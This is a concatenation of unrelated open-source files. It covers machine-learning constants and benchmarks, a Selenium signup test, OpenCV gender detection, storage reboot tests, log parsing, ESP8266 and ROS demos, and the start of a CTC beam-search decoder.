"""EmbeddingType:文本数据需要转换的embedding类型:no_emb , ernie_emb
"""
NONE_EMBEDDING = 0 # 不需要emb
ERNIE_EMBEDDING = 1 # 用ernie生成emb
FLUID_EMBEDDING = 2 # 使用fluid的op生成emb
class FluidDataType(object):
""" FluidDataType data struct wrapper """
def __init__(self, shape, dtype, lod_level, name=None):
self.shape = shape
self.dtype = dtype
self.lod_level = lod_level
self.name = name
class WordPieceType(object):
"""字词混合切分模式下,每个token的type"""
SINGLE_TOKEN = 0 # 单个字
WORD_START = 1 # 词首字符
WORD_INCLUDE = 2 # 词中间字符
class DataShape(object):
"""DataShape:输入的数据类型
"""
STRING = "string" # string
INT = "int" # int64
FLOAT = "float" # float32
class InstanceName(object):
"""InstanceName:一些常用的命名
"""
RECORD_ID = "id"
RECORD_EMB = "emb"
SRC_IDS = "src_ids"
WORDSEG_IDS = "wordseg_ids"
MASK_IDS = "mask_ids"
LOSS_MASK = "loss_mask"
SEQ_LENS = "seq_lens"
SENTENCE_IDS = "sent_ids"
POS_IDS = "pos_ids"
TASK_IDS = "task_ids"
PHONETIC_A_IDS = "phonetic_a_ids"
PHONETIC_B_IDS = "phonetic_b_ids"
GLYPH_A_IDS = "glyph_a_ids"
GLYPH_B_IDS = "glyph_b_ids"
GLYPH_C_IDS = "glyph_c_ids"
GLYPH_D_IDS = "glyph_d_ids"
REL_POS_IDS="rel_pos_ids"
DEEP_IDS = "deep_ids"
BEG_IDS = "beg_ids"
END_IDS = "end_ids"
#生成训练相关key
TGT_LABEL = "tgt_label"
TGT_POS = "tgt_pos"
#生成解码相关key
TGT_SRC_IDS = "tgt_src_ids"
TGT_POS_IDS = "tgt_pos_ids"
INIT_SCORES = "init_scores"
PARENT_IDX = "parent_idx"
TGT_MASK_IDS = 'tgt_mask_ids'
DATA_IDS = 'data_ids'
#多轮对话相关key
ROLE_IDS = "role_ids"
TURN_IDS = "turn_ids"
TGT_PHONETIC_A_IDS = "tgt_phonetic_a_ids"
TGT_PHONETIC_B_IDS = "tgt_phonetic_b_ids"
TGT_GLYPH_A_IDS = "tgt_glyph_a_ids"
TGT_GLYPH_B_IDS = "tgt_glyph_b_ids"
TGT_GLYPH_C_IDS = "tgt_glyph_c_ids"
TGT_GLYPH_D_IDS = "tgt_glyph_d_ids"
# seq2seq的label域相关key
TRAIN_LABEL_SRC_IDS = "train_label_src_ids"
TRAIN_LABEL_MASK_IDS = "train_label_mask_ids"
TRAIN_LABEL_SEQ_LENS = "train_label_seq_lens"
INFER_LABEL_SRC_IDS = "infer_label_src_ids"
INFER_LABEL_MASK_IDS = "infer_label_mask_ids"
INFER_LABEL_SEQ_LENS = "infer_label_seq_lens"
# term rank 相关的key
TERM_POS = "term_pos"
TERM_TOKENS_NUMS = "term_tokens_nums"
TERM_INDEX = "term_index"
TERM_PAIRS = "term_pairs"
TERM_DIFFS = "term_diffs"
SEQUENCE_EMB = "sequence_output" # 词级别的embedding
POOLED_EMB = "pooled_output" # 句子级别的embedding
TARGET_FEED = "target_feed" # 保存模型时需要的入参:表示模型预测时需要输入的变量,tensor 或者variable类型
TARGET_FEED_NAMES = "target_feed_name" # 保存模型时需要的入参:表示模型预测时需要输入的变量名称和顺序
TARGET_PREDICTS = "target_predicts" # 保存模型时需要的入参:表示预测时最终输出的结果
PREDICT_RESULT = "predict_result" # 训练过程中需要传递的预测结果
STUDENT_PREDICT_RESULT = "student_predict_result" # 训练过程中需要传递的预测结果
TEACHER_PREDICT_RESULT = "teacher_predict_result" # 训练过程中需要传递的预测结果
LABEL = "label" # label
TEACHER_CE_LOSS = "teacher_ce_loss"
STUDENT_CE_LOSS = "student_ce_loss"
DISTILL_LOSS = "distill_loss"
PRED_LOSS = "pred_loss"
LOSS = "loss" # loss
# CRF_EMISSION = "crf_emission" # crf_emission
TRAINING = "training" # 训练过程
EVALUATE = "evaluate" # 评估过程
TEST = "test" # 测试过程
SAVE_INFERENCE = "save_inference" # 保存inference model的过程
INFERENCE = "inference" # 预测过程
STEP = "steps"
SPEED = "speed"
TIME_COST = "time_cost"
GPU_ID = "gpu_id"
FILE_CHECKPOINTS = "checkpoints"
FILE_INFERENCE_MODEL = "inference_model"
TYPE_PY_READER = "py_reader"
TYPE_DATA_LOADER = "data_loader"
# ERNIE-VIL相关key
IMAGE_PIXEL_IDS = "image_pixel_ids"
IMAGE_POSITION = "image_position"
IMAGE_TAG_IDS = "image_tag_ids"
TEXT_INDEX = "text_index"
IMAGE_INDEX = "image_index"
POS_INDEX = "pos_index"
# ERNIE-Layout相关key
POS_2D_IDS = "pos_2d_ids"
SEGMENT_IDS = "segment_ids"
# DynaBERT相关key
HIDDEN_LAYERS = "hidden_layers"
LOGIT = "logit"
# prompt相关key
LABEL_MAP_IDS = "label_map_ids"
LABEL_TEXT_IDS = "label_text_ids"
BATCH_SIZE = "batch_size"
MAX_SEQ_LEN = "max_seq_len"
class FieldLength(object):
"""一个field在序列化成field_id_list的时候,占的长度是多少
"""
CUSTOM_TEXT_FIELD = 3
ERNIE_TEXT_FIELD = 6
SINGLE_SCALAR_FIELD = 1
ARRAY_SCALAR_FIELD = 2
BASIC_TEXT_FIELD = 2
GENERATE_LABEL_FIELD = 6
ERNIE_TERM_RANK_TEXT_FIELD = 9
ERNIT_TERM_RANK_LABEL_FIELD = 4
# ERNIE-VIL RELATED VARIABLES
ERNIEVIL_IMAGE_PIXEL_FIELD = 1
ERNIEVIL_IMAGE_TAGS_FIELD = 1
# ERNIE-Layout RELATED VARIABLES
ERNIE_LAYOUT_SEQLABEL_FIELD = 10
class FleetMode(object):
"""Fleet模式
"""
NO_FLEET = "NO_FLEET"
CPU_MODE = "CPU"
GPU_MODE = "GPU"
class UploadModelType(object):
"""模型上传的类型"""
UPLOAD_HDFS_IMMEDIATE = "immediate" # 实时上传到HDFS
UPLOAD_HDFS_LAST_TIME = "last_time" # 训练结束之后由paddlecloud平台进行集中上传
class StoreModelType(object):
"""模型保存方式的类型"""
STORE_HDFS = "hadoop" # 保存到hadoop集群上
STORE_IREPO = "irepo" # 保存到irepo模型仓库中
class EncryptType(object):
"""模型加密的方式"""
ENCRYPT_NONE = None # 不加密
ENCRYPT_MEMORY = "memory" # 内存加密
ENCRYPT_FILE = "file" # 文件加密
class InferenceRetcode(object):
""" 预测服务返回码 """
RET_OK = 200
LOAD_JSON_FAILED = 201
MISSING_FIELD = 202
class GraphMode(object):
"""图模式
"""
#动态图
DYGRAPH = "dynamic"
#静态图
STATIC = "static"
|
scripts/selenium/test.py | Mlrobinson1993/trustroots | 377 | 30557 | #!/usr/bin/env python
from browsers import browsers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
import time
import sys
import re
import signal
print 'Trustroots Selenium tests'
# URL is passed as an argument
if len(sys.argv) > 1:
test_url = sys.argv[1]
# Default to localhost
else:
test_url = 'http://localhost:3000/'
print 'Testing URL: ' + test_url
class Main:
def __init__(self):
try:
from config_browserstack import browserstack_url
no_browserstack = 0
except ImportError:
no_browserstack = 1
no_browserstack = 1
for cap in browsers:
if cap['env'] == 'remote' and no_browserstack:
if no_browserstack == 1:
print 'sorry, no browserstack'
no_browserstack = 2 # Should be cleaner
else:
if cap['env'] == 'local':
driver = getattr(webdriver, cap['browser'])()
else:
print 'launching', cap
driver = webdriver.Remote(
command_executor=browserstack_url,
desired_capabilities=cap
)
try:
self.t = TestSuite(driver, cap, test_url)
except:
print sys.exc_info()
finally:
if cap['env'] == 'remote':
driver.quit()
class TestSuite:
def __init__(self, driver, cap, url):
self.wait = WebDriverWait(driver, 15)
self.driver = driver
self.cap = cap
self.url = url
def signal_handler(signal, frame):
print('Handling Ctrl+C!')
if hasattr(self, 'driver') and self.driver:
print 'Trying driver.quit()'
self.driver.quit()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
try:
self.run_tests()
except:
print cap
print sys.exc_info()
def run_tests(self):
self.username = 'tester' + str(time.time())[5:10]
self.email = self.username + '@example.tld'
self.password = '<PASSWORD>'
self.driver.get(self.url)
self.test_signup()
self.test_home_map()
self.test_logout_signin()
self.test_logout_signin_email()
def test_signup(self):
if not "Trustroots" in self.driver.title:
raise Exception("Unable to load page!")
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-signup')
if not 'Trustroots' in self.driver.title:
raise Exception("Unable to load page!")
self._wait_and_click(self.driver.find_element_by_id, 'firstName')
self.driver.find_element_by_id('firstName').send_keys('Tester')
self.driver.find_element_by_id('lastName').send_keys('Tester')
self.driver.find_element_by_id('username').send_keys(self.username)
self.driver.find_element_by_id('email').send_keys(self.email)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
self._wait_and_click(self.driver.find_element_by_id, 'signup-edit')
def test_logout_signin(self):
self.driver.get(self.url + 'auth/signout')
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
self.driver.find_element_by_id('username').send_keys(self.username)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
def test_logout_signin_email(self):
self.driver.get(self.url + 'auth/signout')
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
self.driver.find_element_by_id('username').send_keys(self.email)
self.driver.find_element_by_id('password').send_keys(<PASSWORD>)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
def test_home_map(self):
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.navbar-brand')
self.driver.find_element_by_id('search-query').send_keys('Berlin' + Keys.RETURN)
def _assert_contains_regexp(self, regexp):
text_found = re.search(regexp, self.driver.page_source)
print text_found
assert text_found != None
def _wait_and_click_id(self, _id, pause=0):
self._wait_and_click(self.driver.find_element_by_id, _id, pause)
def _wait_and_click(self, func, param, pause=0):
if pause == 0:
self.wait.until(lambda _: func(param).is_displayed())
else:
self._sleep(pause)
func(param).click()
m = Main()
|
demo/utils/genderdetect.py | TommyZihao/MMGEN-FaceStylor | 122 | 30562 | <reponame>TommyZihao/MMGEN-FaceStylor<gh_stars>100-1000
import random
import cv2
padding = 20
MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
genderList = ['Male', 'Female']
class GenderDetection():
def __init__(self):
faceProto = 'data/opencv_face_detector.pbtxt'
faceModel = 'data/opencv_face_detector_uint8.pb'
genderProto = 'data/gender_deploy.prototxt'
genderModel = 'data/gender_net.caffemodel'
self.ans = [True, False]
self.faceNet = cv2.dnn.readNet(faceModel, faceProto)
self.genderNet = cv2.dnn.readNet(genderModel, genderProto)
def highlightFace(self, net, frame, conf_threshold=0.9):
frameOpencvDnn = frame.copy()
frameHeight = frameOpencvDnn.shape[0]
frameWidth = frameOpencvDnn.shape[1]
blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300),
[104, 117, 123], True, False)
net.setInput(blob)
detections = net.forward()
faceBoxes = []
for i in range(detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > conf_threshold:
x1 = int(detections[0, 0, i, 3] * frameWidth)
y1 = int(detections[0, 0, i, 4] * frameHeight)
x2 = int(detections[0, 0, i, 5] * frameWidth)
y2 = int(detections[0, 0, i, 6] * frameHeight)
faceBoxes.append([x1, y1, x2, y2])
cv2.rectangle(frameOpencvDnn, (x1, y1), (x2, y2), (0, 255, 0),
int(round(frameHeight / 150)), 8)
return frameOpencvDnn, faceBoxes
# opencv
def detect(self, img):
try:
resultImg, faceBoxes = self.highlightFace(self.faceNet, img)
if not faceBoxes:
return self.ans[random.randint(0, 1)]
for faceBox in faceBoxes:
if (max(faceBox) > 1024):
continue
face = img[max(0, faceBox[1] -
padding):min(faceBox[3] +
padding, img.shape[0] - 1),
max(0, faceBox[0] -
padding):min(faceBox[2] +
padding, img.shape[1] - 1)]
blob = cv2.dnn.blobFromImage(face,
1.0, (227, 227),
MODEL_MEAN_VALUES,
swapRB=False)
self.genderNet.setInput(blob)
genderPreds = self.genderNet.forward()
gender = genderList[genderPreds[0].argmax()]
if (gender == 'Female'):
return True
else:
return False
except: # isort:skip # noqa
return self.ans[random.randint(0, 1)]
|
fclib/tests/test_dcnn.py | barrosm/forecasting | 2,276 | 30566 | <gh_stars>1000+
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from fclib.models.dilated_cnn import create_dcnn_model
def test_create_dcnn_model():
mod0 = create_dcnn_model(seq_len=1) # default args
assert mod0 is not None
mod1 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=1, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod1 is not None
mod2 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=2, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod2 is not None
|
Alignment/CommonAlignmentProducer/python/ALCARECOTkAlMinBias_Output_cff.py | ckamtsikis/cmssw | 852 | 30605 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
# AlCaReco for track based alignment using MinBias events
OutALCARECOTkAlMinBias_noDrop = cms.PSet(
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('pathALCARECOTkAlMinBias')
),
outputCommands = cms.untracked.vstring(
'keep *_ALCARECOTkAlMinBias_*_*',
'keep L1AcceptBunchCrossings_*_*_*',
'keep L1GlobalTriggerReadoutRecord_gtDigis_*_*',
'keep *_TriggerResults_*_*',
'keep DcsStatuss_scalersRawToDigi_*_*',
'keep *_offlinePrimaryVertices_*_*',
'keep *_offlineBeamSpot_*_*')
)
import copy
OutALCARECOTkAlMinBias = copy.deepcopy(OutALCARECOTkAlMinBias_noDrop)
OutALCARECOTkAlMinBias.outputCommands.insert(0, "drop *")
|
benchmarks/roberta/benchmark_tft.py | legacyai/tf-transformers | 116 | 30617 | """TFTBechmark scripts"""
import shutil
import tempfile
import time
import tensorflow as tf
import tqdm
from datasets import load_dataset
from transformers import RobertaTokenizerFast
from tf_transformers.models import Classification_Model
from tf_transformers.models import RobertaModel as Model
_ALLOWED_DECODER_TYPES = ["keras_model", "saved_model"]
class TftBenchmark:
def __init__(self, cfg):
self.cfg = cfg
# Check compatible model type
self.model_type = cfg.benchmark.model.type
if self.model_type not in _ALLOWED_DECODER_TYPES:
raise ValueError("Unknow model type {} defined".format(self.model_type))
self.model_name = cfg.benchmark.model.name
self.tokenizer = RobertaTokenizerFast.from_pretrained(self.model_name)
self.temp_dir = tempfile.mkdtemp()
def load_and_batch_dataset(self):
"""Load TF dataset"""
cfg = self.cfg
tokenizer = self.tokenizer
# Load from hydra config
dataset_name = cfg.benchmark.data.name
take_sample = cfg.benchmark.data.take_sample
batch_size = cfg.benchmark.data.batch_size
max_length = cfg.benchmark.data.max_length
dataset = load_dataset(dataset_name, split="test")
if take_sample:
dataset = dataset.select(range(50))
# Add summarize: with text
self.dataset = dataset
dataset = dataset.map(
lambda e: tokenizer(e["text"], truncation=True, padding=True, max_length=max_length),
batched=True,
)
dataset.set_format(type="tensorflow", columns=["input_ids"])
features = {
x: tf.cast(dataset[x], dtype=tf.int32).to_tensor(default_value=0, shape=[None, max_length])
for x in ["input_ids"]
}
features['input_mask'] = tf.ones_like(features['input_ids'])
features['input_type_ids'] = tf.zeros_like(features['input_ids'])
tfdataset = tf.data.Dataset.from_tensor_slices((features)).batch(batch_size)
# Convert alldataset to a list for not including that latency while measuring model
# performance
# (batch_dataset, batch_size, seq_length)
batched_datasets = [(batch_dataset, batch_dataset['input_ids'].shape[0]) for batch_dataset in tfdataset]
return batched_datasets
def _load_keras_model(self):
"""Load using TextDecoder KerasModel"""
def classifier_fn(model):
def _classifier_fn(inputs):
return model(inputs)
return _classifier_fn
model_name = self.cfg.benchmark.model.name
# Load Auto Regressive Version
model = Model.from_pretrained(model_name=model_name)
model = Classification_Model(model, num_classes=2)
model = model.get_model()
return classifier_fn(model)
def _load_saved_model(self):
"""Load using TextDecoder saved_model"""
def classifier_fn():
model = self.loaded.signatures['serving_default']
def _classifier_fn(inputs):
return model(**inputs)
return _classifier_fn
model_name = self.cfg.benchmark.model.name
model = Model.from_pretrained(model_name=model_name)
model = Classification_Model(model, num_classes=2)
model = model.get_model()
# Save as saved_model
model.save_serialized(self.temp_dir, overwrite=True)
# Load as saved_model
del model
self.loaded = tf.saved_model.load(self.temp_dir)
return classifier_fn()
def load_model_classifier_fn(self):
"""Load Model"""
if self.model_type == "keras_model":
classifier_fn = self._load_keras_model()
if self.model_type == "saved_model":
classifier_fn = self._load_saved_model()
return classifier_fn
def run(self):
#### Load Decoder function
classifier_fn = self.load_model_classifier_fn()
print("Decoder function loaded succesfully")
#### Load dataset
batched_datasets = self.load_and_batch_dataset()
print("Dataset loaded succesfully")
import gc
gc.collect()
#### Run classifier function
# Sample batch (to avoid first time compilation time)
sample_batch_inputs, _ = batched_datasets[0]
outputs = classifier_fn(sample_batch_inputs)
slines = 0
start_time = time.time()
for (batch_inputs, batch_size) in tqdm.tqdm(batched_datasets, unit="batch "):
outputs = classifier_fn(batch_inputs) # noqa
slines += batch_size
end_time = time.time()
shutil.rmtree(self.temp_dir)
time_taken = end_time - start_time
samples_per_second = slines / time_taken
return {"model_type": self.model_type, "time_taken": time_taken, "samples_per_second": samples_per_second}
|
test/functional/tests/initialize/test_clean_reboot.py | Ostrokrzew/open-cas-linux | 139 | 30623 | #
# Copyright(c) 2020-2021 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause-Clear
#
import os
import pytest
from api.cas import casadm
from api.cas.cache_config import CacheMode
from core.test_run import TestRun
from storage_devices.disk import DiskTypeSet, DiskType, DiskTypeLowerThan
from test_tools.dd import Dd
from test_tools.disk_utils import Filesystem
from test_utils.filesystem.file import File
from test_utils.os_utils import drop_caches, DropCachesMode, sync
from test_utils.size import Size, Unit
mount_point = "/mnt/test"
@pytest.mark.require_disk("cache", DiskTypeSet([DiskType.optane, DiskType.nand]))
@pytest.mark.require_disk("core", DiskTypeLowerThan("cache"))
@pytest.mark.parametrizex("cache_mode", CacheMode)
@pytest.mark.parametrizex("filesystem", Filesystem)
@pytest.mark.parametrizex("reboot_type", ["soft", "hard"])
@pytest.mark.require_plugin("power_control")
def test_load_after_clean_shutdown(reboot_type, cache_mode, filesystem):
"""
title: Planned system shutdown test.
description: Test for data consistency after clean system shutdown.
pass_criteria:
- DUT should reboot successfully.
- Checksum of file on core device should be the same before and after reboot.
"""
with TestRun.step("Prepare CAS device."):
cache_disk = TestRun.disks['cache']
cache_disk.create_partitions([Size(1, Unit.GibiByte)])
cache_dev = cache_disk.partitions[0]
core_dev = TestRun.disks['core']
cache = casadm.start_cache(cache_dev, cache_mode, force=True)
core = cache.add_core(core_dev)
core.create_filesystem(filesystem, blocksize=int(Size(1, Unit.Blocks4096)))
core.mount(mount_point)
with TestRun.step("Create file on cache and count its checksum."):
test_file = File(os.path.join(mount_point, "test_file"))
Dd()\
.input("/dev/zero")\
.output(test_file.full_path)\
.block_size(Size(1, Unit.KibiByte))\
.count(1024)\
.run()
test_file.refresh_item()
test_file_md5 = test_file.md5sum()
sync()
drop_caches(DropCachesMode.ALL)
with TestRun.step("Reset platform."):
if reboot_type == "soft":
TestRun.executor.reboot()
else:
power_control = TestRun.plugin_manager.get_plugin('power_control')
power_control.power_cycle()
with TestRun.step("Load cache."):
casadm.load_cache(cache_dev)
core.mount(mount_point)
with TestRun.step("Check file md5sum."):
test_file.refresh_item()
if test_file_md5 != test_file.md5sum():
TestRun.LOGGER.error("Checksums does not match - file is corrupted.")
else:
TestRun.LOGGER.info("File checksum is correct.")
with TestRun.step("Remove test file."):
test_file.remove()
|
ml-models-analyses/readahead-mixed-workload/kmlparsing.py | drewscottt/kernel-ml | 167 | 30651 | <filename>ml-models-analyses/readahead-mixed-workload/kmlparsing.py<gh_stars>100-1000
#
# Copyright (c) 2019-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2020-2021 <NAME>
# Copyright (c) 2020-2021 <NAME>
# Copyright (c) 2019-2021 <NAME>
# Copyright (c) 2019-2021 Stony Brook University
# Copyright (c) 2019-2021 The Research Foundation of SUNY
#
# You can redistribute it and/or modify it under the terms of the Apache License,
# Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0).
#
from collections import defaultdict
import re
import sys
import os
def find_avg_faults(time_values):
x = []
y = []
for vals in time_values:
t_delta = vals[0]
maj_faults = vals[1]
avg = maj_faults / t_delta
prev = x[-1] if len(x) else 0
x.append(prev + t_delta)
y.append(avg)
return x, y
def avg(data):
total = 0
for duration, x in data:
total += x
return total/len(data)
def weighted_avg(data):
time = 0
total = 0
for duration, x in data:
time += duration
total += duration * x
return total/time
def parse_bench_time_values(values_dict, fn, workloads):
start = re.compile(r'\tCommand being timed: "\S+ --benchmarks=(\w+)')
elap = re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)')
major = re.compile(r'\tMajor \(requiring I/O\) page faults: (\d+)')
minor = re.compile(r'\tMinor \(reclaiming a frame\) page faults: (\d+)')
inputs = re.compile(r'\tFile system inputs: (\d+)')
outputs = re.compile(r'\tFile system outputs: (\d+)')
end = re.compile(r'\tExit status: \d+')
with open(fn) as f:
for line in f.readlines():
match = start.match(line)
if match:
curr_workload = match.group(1)
load_set = set(workloads)
load_set.remove(curr_workload)
other_workload = load_set.pop()
workload = values_dict[(curr_workload, other_workload)]
data = []
match = elap.match(line)
if match:
sec = 60 * int(match.group(1))
sec += float(match.group(2))
data.append(sec)
for exp in [major, minor, inputs, outputs]:
match = exp.match(line)
if match:
data.append(int(match.group(1)))
break
match = end.match(line)
if match:
workload.append(data)
def parse_bench_ops_sec(values_dict, fn):
start = re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.* (\d+) ops/sec;\s+([0-9\.]+) MB/s')
rwrandomstart = re.compile(r'readrandomwriterandom\s*:.* (\d+) ops/sec;')
total_occ_dict = {}
with open(fn) as f:
data = None
for line in f.readlines():
if data == None:
match = start.match(line)
if match:
curr_workload = match.group(1)
ops = match.group(4)
values_dict.setdefault(curr_workload, 0)
values_dict[curr_workload] += int(ops)
total_occ_dict.setdefault(curr_workload, 0)
total_occ_dict[curr_workload] += 1
data = None
match = rwrandomstart.match(line)
if match:
curr_workload = 'readrandomwriterandom'
ops = match.group(1)
values_dict.setdefault(curr_workload, 0)
values_dict[curr_workload] += int(ops)
total_occ_dict.setdefault(curr_workload, 0)
total_occ_dict[curr_workload] += 1
data = None
continue
for key in total_occ_dict.keys():
values_dict[key] /= total_occ_dict[key]
def parse_bench_throughput(values_dict, fn, workloads):
start = re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.*;\s+([0-9\.]+) MB/s')
rwrandomstart = re.compile(r'readrandomwriterandom\s*:.*;')
elap = re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)')
end = re.compile(r'\tExit status: \d+')
with open(fn) as f:
data = None
for line in f.readlines():
if data == None:
match = start.match(line)
if match:
curr_workload = match.group(1)
load_set = set(workloads)
load_set.remove(curr_workload)
other_workload = load_set.pop()
workload = values_dict[(curr_workload, other_workload)]
throughput = match.group(4)
data = [0, float(throughput)]
# jk we don't need elap time and sometimes output gets intermixed
workload.append(data)
data = None
match = rwrandomstart.match(line)
if match:
curr_workload = 'readrandomwriterandom'
load_set = set(workloads)
load_set.remove(curr_workload)
other_workload = load_set.pop()
workload = values_dict[(curr_workload, other_workload)]
data = [0, 1]
# jk we don't need elap time and sometimes output gets intermixed
workload.append(data)
data = None
continue
match = elap.match(line)
if match:
sec = 60 * int(match.group(1))
sec += float(match.group(2))
data.insert(0, sec)
continue
match = end.match(line)
if match:
workload.append(data)
data = None
def generate_combos():
wkload_combos = []
# needs to be in same order as iterated through in generate-result-*.sh
for seq in ["readseq", "readreverse"]:
#for rand in ["readrandom", "readrandomwriterandom"]:
#for rand in ["mixgraph"]:
for rand in ["readrandom", "readrandomwriterandom", "mixgraph"]:
wkload_combos.append((seq,rand))
return wkload_combos
def parse_detail_file(dict_exp, file_path) -> defaultdict:
combos = generate_combos()
i = 0
with open(os.path.join(os.curdir, file_path)) as f:
lines = f.readlines()
curr_exp = None
for line in lines:
values = line.split()
if len(values) == 2:
if values[1] == '1':
curr_exp = values[0]
while curr_exp not in combos[i]:
i += 1
if i == len(combos):
print(f'detail file {file_path} badly formatted')
print(f'{curr_exp} not in combos {combos}')
sys.exit(1)
background_exp = set(combos[i])
background_exp.remove(curr_exp)
background_exp = background_exp.pop()
curr_exp = (curr_exp, background_exp)
i += 1
elif values[0] not in curr_exp:
print(f'detail file {file_path} badly formatted')
sys.exit(1)
else:
if curr_exp == None:
print(f'detail file {file_path} badly formatted')
sys.exit(1)
x = 0 if len(dict_exp[curr_exp]) == 0 else dict_exp[curr_exp][-1][0] + float(values[4])
dict_exp[curr_exp].append([x, float(values[2])])
return dict_exp
def parse_kern_log_file(file_path) -> defaultdict:
dict_exp = defaultdict(list)
with open(os.path.join(os.curdir, file_path)) as f:
lines = f.readlines()
for line in lines:
values = line.split()
if len(values) == 2:
curr_exp = tuple(values)
elif values[5] == 'readahead':
dict_exp[curr_exp].append(float(values[8]))
return dict_exp
def mean(arr):
return sum(arr)/len(arr)
|
network/demo_espat_ap_test.py | 708yamaguchi/MaixPy_scripts | 485 | 30655 | <reponame>708yamaguchi/MaixPy_scripts
# This file is part of MaixPY
# Copyright (c) sipeed.com
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
from network_espat import wifi
wifi.reset()
print(wifi.at_cmd("AT\r\n"))
print(wifi.at_cmd("AT+GMR\r\n"))
'''
>>> reset...
b'\r\n\r\nOK\r\n'
b'AT version:1.1.0.0(May 11 2016 18:09:56)\r\nSDK version:1.5.4(baaeaebb)\r\ncompile time:May 20 2016 15:06:44\r\nOK\r\n'
MicroPython v0.5.1-136-g039f72b6c-dirty on 2020-11-18; Sipeed_M1 with kendryte-k210
Type "help()" for more information.
>>>
'''
|
stockroom_bot/stock_products.py | amjadmajid/rosbook | 442 | 30660 | <filename>stockroom_bot/stock_products.py
#!/usr/bin/env python
import rospy, tf
from gazebo_msgs.srv import *
from geometry_msgs.msg import *
if __name__ == '__main__':
rospy.init_node("stock_products")
rospy.wait_for_service("gazebo/delete_model") # <1>
rospy.wait_for_service("gazebo/spawn_sdf_model")
delete_model = rospy.ServiceProxy("gazebo/delete_model", DeleteModel)
s = rospy.ServiceProxy("gazebo/spawn_sdf_model", SpawnModel)
orient = Quaternion(*tf.transformations.quaternion_from_euler(0, 0, 0))
with open("models/product_0/model.sdf", "r") as f:
product_xml = f.read() # <2>
for product_num in xrange(0, 12):
item_name = "product_{0}_0".format(product_num)
delete_model(item_name) # <3>
for product_num in xrange(0, 12):
bin_y = 2.8 * (product_num / 6) - 1.4 # <4>
bin_x = 0.5 * (product_num % 6) - 1.5
item_name = "product_{0}_0".format(product_num)
item_pose = Pose(Point(x=bin_x, y=bin_y, z=2), orient) # <5>
s(item_name, product_xml, "", item_pose, "world") # <6>
|
openspeech/search/beam_search_ctc.py | techthiyanes/openspeech | 207 | 30676 | <reponame>techthiyanes/openspeech<filename>openspeech/search/beam_search_ctc.py<gh_stars>100-1000
# MIT License
#
# Copyright (c) 2021 <NAME> and <NAME> and <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import torch.nn as nn
from openspeech.utils import CTCDECODE_IMPORT_ERROR
class BeamSearchCTC(nn.Module):
r"""
Decodes probability output using ctcdecode package.
Args:
labels (list): the tokens you used to train your model
lm_path (str): the path to your external kenlm language model(LM).
alpha (int): weighting associated with the LMs probabilities.
beta (int): weight associated with the number of words within our beam
cutoff_top_n (int): cutoff number in pruning. Only the top cutoff_top_n characters with the highest probability
in the vocab will be used in beam search.
cutoff_prob (float): cutoff probability in pruning. 1.0 means no pruning.
beam_size (int): this controls how broad the beam search is.
num_processes (int): parallelize the batch using num_processes workers.
blank_id (int): this should be the index of the CTC blank token
Inputs: logits, sizes
- logits: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t
- sizes: Size of each sequence in the mini-batch
Returns:
- outputs: sequences of the model's best prediction
"""
def __init__(
self,
labels: list,
lm_path: str = None,
alpha: int = 0,
beta: int = 0,
cutoff_top_n: int = 40,
cutoff_prob: float = 1.0,
beam_size: int = 3,
num_processes: int = 4,
blank_id: int = 0,
) -> None:
super(BeamSearchCTC, self).__init__()
try:
from ctcdecode import CTCBeamDecoder
except ImportError:
